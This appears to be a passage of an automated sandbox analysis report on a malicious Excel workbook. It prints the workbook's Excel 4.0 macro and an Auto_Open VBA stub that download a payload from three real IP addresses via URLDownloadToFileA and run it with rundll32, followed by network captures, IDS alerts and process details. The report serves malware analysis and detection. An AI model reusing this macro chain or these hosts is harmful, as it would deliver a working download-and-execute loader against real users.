                                                                                                                                                  Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                                  Data Raw:01 fc b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 be 20 84 62 0e 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                                  Macro 4.0 Code

                                                                                                                                                  ,,"=CONCATENATE(AF80,AG80,AH78,AG78,AG79)",,,,,,"=CONCATENATE(AF80,AG81,AH78,AG78,AG79)",,1,,,,"=CONCATENATE(AF80,AG82,AH78,AG78,AG79)",,9,,,,,,,"=ON.TIME(NOW()+""00:00:02"",""Grestes"")",,,.d,=NOW(),,,,,at,"=FORMULA(AG85&AG86&AG92,AI83)",,,,"=""http://""","=""91.211.91.81/""",,,=HALT(),,,"=""5.34.179.36/""",,,,,,"=""45.153.229.23/""",,uRlMon,,,,,,,,,,,,JJCCBB,,,,"=""URLDo""",,Belandes,,,,"=""wnloadT""",,,,,,,=GOTO(Blodas!G6),,,,,,,..\Ladfge.VDGfwr,,,,,,,,,,,,,,,,,,,,,,"=""oFileA""",,,,
                                                                                                                                                  "=REGISTER(Nyukasl!AI82,Nyukasl!AI83,Nyukasl!AI84,Nyukasl!AI85,,Nyukasl!AI75,9)""=Belandes(0,Nyukasl!AG74,Nyukasl!AI88,0,0)""=IF(G12<0, Belandes(0,Nyukasl!AG75,Nyukasl!AI88,0,0))""=IF(G13<0, Belandes(0,Nyukasl!AG76,Nyukasl!AI88,0,0))""=IF(G14<0,CLOSE(0),)"=GOTO(Jioka!H4)
                                                                                                                                                  ,"=""rund""",,"=""ll32 ..\Ladfge.VDGfwr,DllReg""","=""isterServer""",,,,,=PI()=EXEC(I7&I9&I10)=PI(),,,,=HALT(),

                                                                                                                                                  Network Behavior

                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                  05/04/21-17:31:37.151983TCP1201ATTACK-RESPONSES 403 Forbidden804916591.211.91.81192.168.2.22
                                                                                                                                                  05/04/21-17:31:37.893150TCP1201ATTACK-RESPONSES 403 Forbidden80491665.34.179.36192.168.2.22
                                                                                                                                                  05/04/21-17:31:38.095777TCP1201ATTACK-RESPONSES 403 Forbidden804916745.153.229.23192.168.2.22

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  May 4, 2021 17:38:34.001015902 CEST4972280192.168.2.391.211.91.81
                                                                                                                                                  May 4, 2021 17:38:34.084767103 CEST804972291.211.91.81192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:34.084867001 CEST4972280192.168.2.391.211.91.81
                                                                                                                                                  May 4, 2021 17:38:34.086118937 CEST4972280192.168.2.391.211.91.81
                                                                                                                                                  May 4, 2021 17:38:34.169622898 CEST804972291.211.91.81192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:34.233530998 CEST804972291.211.91.81192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:34.233715057 CEST4972280192.168.2.391.211.91.81
                                                                                                                                                  May 4, 2021 17:38:34.277417898 CEST4972380192.168.2.35.34.179.36
                                                                                                                                                  May 4, 2021 17:38:34.425004959 CEST80497235.34.179.36192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:34.425205946 CEST4972380192.168.2.35.34.179.36
                                                                                                                                                  May 4, 2021 17:38:34.463059902 CEST4972380192.168.2.35.34.179.36
                                                                                                                                                  May 4, 2021 17:38:34.608505964 CEST80497235.34.179.36192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:35.012475967 CEST80497235.34.179.36192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:35.012568951 CEST4972380192.168.2.35.34.179.36
                                                                                                                                                  May 4, 2021 17:38:35.017116070 CEST4972580192.168.2.345.153.229.23
                                                                                                                                                  May 4, 2021 17:38:35.084460974 CEST804972545.153.229.23192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:35.084939957 CEST4972580192.168.2.345.153.229.23
                                                                                                                                                  May 4, 2021 17:38:35.085726023 CEST4972580192.168.2.345.153.229.23
                                                                                                                                                  May 4, 2021 17:38:35.150355101 CEST804972545.153.229.23192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:35.210279942 CEST804972545.153.229.23192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:35.210450888 CEST4972580192.168.2.345.153.229.23
                                                                                                                                                  May 4, 2021 17:39:39.233378887 CEST804972291.211.91.81192.168.2.3
                                                                                                                                                  May 4, 2021 17:39:39.233545065 CEST4972280192.168.2.391.211.91.81
                                                                                                                                                  May 4, 2021 17:39:40.013036966 CEST80497235.34.179.36192.168.2.3
                                                                                                                                                  May 4, 2021 17:39:40.013144016 CEST4972380192.168.2.35.34.179.36
                                                                                                                                                  May 4, 2021 17:39:40.211793900 CEST804972545.153.229.23192.168.2.3
                                                                                                                                                  May 4, 2021 17:39:40.211869955 CEST4972580192.168.2.345.153.229.23
                                                                                                                                                  May 4, 2021 17:40:15.518287897 CEST4972580192.168.2.345.153.229.23
                                                                                                                                                  May 4, 2021 17:40:15.520262957 CEST4972380192.168.2.35.34.179.36
                                                                                                                                                  May 4, 2021 17:40:15.520785093 CEST4972280192.168.2.391.211.91.81
                                                                                                                                                  May 4, 2021 17:40:15.587034941 CEST804972545.153.229.23192.168.2.3
                                                                                                                                                  May 4, 2021 17:40:15.604607105 CEST804972291.211.91.81192.168.2.3
                                                                                                                                                  May 4, 2021 17:40:15.666804075 CEST80497235.34.179.36192.168.2.3

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  May 4, 2021 17:38:12.029839993 CEST4919953192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:12.078516960 CEST53491998.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:12.828279972 CEST5062053192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:12.877003908 CEST53506208.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:13.706718922 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:13.767060041 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:14.616766930 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:14.670813084 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:15.492141962 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:15.541824102 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:16.673034906 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:16.722683907 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:17.938657999 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:17.990377903 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:19.188354969 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:19.237061977 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:24.480259895 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:24.528985023 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:25.570234060 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:25.661541939 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:25.872539043 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:25.921317101 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:26.616837978 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:26.691057920 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:27.622247934 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:27.682998896 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:28.657855034 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:28.718725920 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:29.434676886 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:29.483266115 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:30.669523001 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:30.730911016 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:32.015526056 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:32.066981077 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:32.816648960 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:32.867364883 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:33.748645067 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:33.810759068 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:34.665618896 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:34.739639997 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:34.829763889 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:34.882055044 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:36.463641882 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:36.515870094 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:37.590553999 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:37.639255047 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:38.470926046 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:38.519608974 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:39.296072960 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:39.344980001 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:40.112826109 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:40.163044930 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:49.279464960 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:49.338754892 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:38:49.991504908 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:38:50.040185928 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:39:00.218113899 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:39:00.281357050 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:39:08.015546083 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:39:08.075789928 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:39:29.808487892 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:39:29.857932091 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:39:36.206809044 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:39:36.265146017 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:39:52.295336962 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:39:52.360425949 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:40:06.671833038 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:40:06.720465899 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                  May 4, 2021 17:40:09.491715908 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                  May 4, 2021 17:40:09.555052996 CEST53565798.8.8.8192.168.2.3

                                                                                                                                                  ICMP Packets

                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                  May 4, 2021 17:38:37.639370918 CEST192.168.2.38.8.8.8d077(Port unreachable)Destination Unreachable

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • 91.211.91.81
                                                                                                                                                  • 5.34.179.36
                                                                                                                                                  • 45.153.229.23

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.34972291.211.91.8180C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  May 4, 2021 17:38:34.086118937 CEST1194OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: 91.211.91.81
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  May 4, 2021 17:38:34.233530998 CEST1199INHTTP/1.1 403 Forbidden
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 04 May 2021 15:38:34 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  1192.168.2.3497235.34.179.3680C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  May 4, 2021 17:38:34.463059902 CEST1206OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: 5.34.179.36
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  May 4, 2021 17:38:35.012475967 CEST1210INHTTP/1.1 403 Forbidden
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 04 May 2021 15:38:34 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  2192.168.2.34972545.153.229.2380C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  May 4, 2021 17:38:35.085726023 CEST1211OUTGET /44313,6048108796.dat HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: 45.153.229.23
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  May 4, 2021 17:38:35.210279942 CEST1216INHTTP/1.1 403 Forbidden
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 04 May 2021 15:38:35 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Start time:17:38:24
                                                                                                                                                  Start date:04/05/2021
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                  Imagebase:0x60000
                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Call Graph

                                                                                                                                                  Graph

                                                                                                                                                  • Entrypoint
                                                                                                                                                  • Decryption Function
                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  • Show Help
                                                                                                                                                  callgraph 2 Auto_Open Run:3,Range:3

                                                                                                                                                  Module: Blasr

                                                                                                                                                  Declaration
                                                                                                                                                  LineContent
                                                                                                                                                  1

                                                                                                                                                  Attribute VB_Name = "Blasr"

                                                                                                                                                  Executed Functions
                                                                                                                                                  APIsMeta Information

                                                                                                                                                  Run

                                                                                                                                                  Microsoft Excel:Application.Run()

                                                                                                                                                  Range

                                                                                                                                                  Run

                                                                                                                                                  Range

                                                                                                                                                  Run

                                                                                                                                                  Range

                                                                                                                                                  StringsDecrypted Strings
                                                                                                                                                  "AJ6"
                                                                                                                                                  "Nyukasl"
                                                                                                                                                  "A5"
                                                                                                                                                  "Nyukasl"
                                                                                                                                                  "A5"
                                                                                                                                                  "Nyukasl"
                                                                                                                                                  LineInstructionMeta Information
                                                                                                                                                  2

                                                                                                                                                  Private Sub Auto_Open()

                                                                                                                                                  3

                                                                                                                                                  Application.Run Sheets("Nyukasl").Range("AJ6")

                                                                                                                                                  Microsoft Excel:Application.Run()

                                                                                                                                                  Range

                                                                                                                                                  executed
                                                                                                                                                  5

                                                                                                                                                  Application.Run Sheets("Nyukasl").Range("A5")

                                                                                                                                                  Run

                                                                                                                                                  Range

                                                                                                                                                  6

                                                                                                                                                  Application.Run Sheets("Nyukasl").Range("A5")

                                                                                                                                                  Run

                                                                                                                                                  Range

                                                                                                                                                  13

                                                                                                                                                  End Sub

                                                                                                                                                  Module: Briks

                                                                                                                                                  Declaration
                                                                                                                                                  LineContent
                                                                                                                                                  1

                                                                                                                                                  Attribute VB_Name = "Briks"

                                                                                                                                                  2

                                                                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                  3

                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                  4

                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                  5

                                                                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                                                                  6

                                                                                                                                                  Attribute VB_Exposed = True

                                                                                                                                                  7

                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                  8

                                                                                                                                                  Attribute VB_Customizable = True

                                                                                                                                                  Module: Byutut

                                                                                                                                                  Declaration
                                                                                                                                                  LineContent
                                                                                                                                                  1

                                                                                                                                                  Attribute VB_Name = "Byutut"

                                                                                                                                                  Module: Class1

                                                                                                                                                  Declaration
                                                                                                                                                  LineContent
                                                                                                                                                  1

                                                                                                                                                  Attribute VB_Name = "Class1"

                                                                                                                                                  2

